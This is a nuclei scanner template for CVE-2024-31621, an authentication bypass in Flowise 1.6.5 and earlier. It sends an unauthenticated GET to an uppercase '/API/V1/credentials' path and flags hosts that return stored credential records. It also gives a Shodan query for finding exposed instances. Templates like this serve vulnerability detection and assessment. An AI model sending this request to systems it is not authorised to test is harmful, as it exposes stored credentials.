nuclei-templates/http/cves/2024/CVE-2024-31621.yaml

36 lines
998 B
YAML

id: CVE-2024-31621
info:
name: Flowise 1.6.5 - Authentication Bypass
author: DhiyaneshDK
severity: high
description: |
The flowise version <= 1.6.5 is vulnerable to authentication bypass vulnerability.
reference:
- https://www.exploit-db.com/exploits/52001
- https://github.com/FlowiseAI/Flowise/releases
- https://flowiseai.com/
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-2051052918
tags: cve,cve2024,auth-bypass,flowise
http:
- method: GET
path:
- "{{BaseURL}}/API/V1/credentials"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"credentialName":'
- '"updatedDate":'
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100d9304152d30fa5644b18033462ab1ed52f23ce5c4a695a6a8aebb824ca3ea457022100e6b1c27bfc23808cc83a3cad56e4e7796d3483c7fb35c8253aaddad5a1aac110:922c64590222798bb761d5b6d8e72950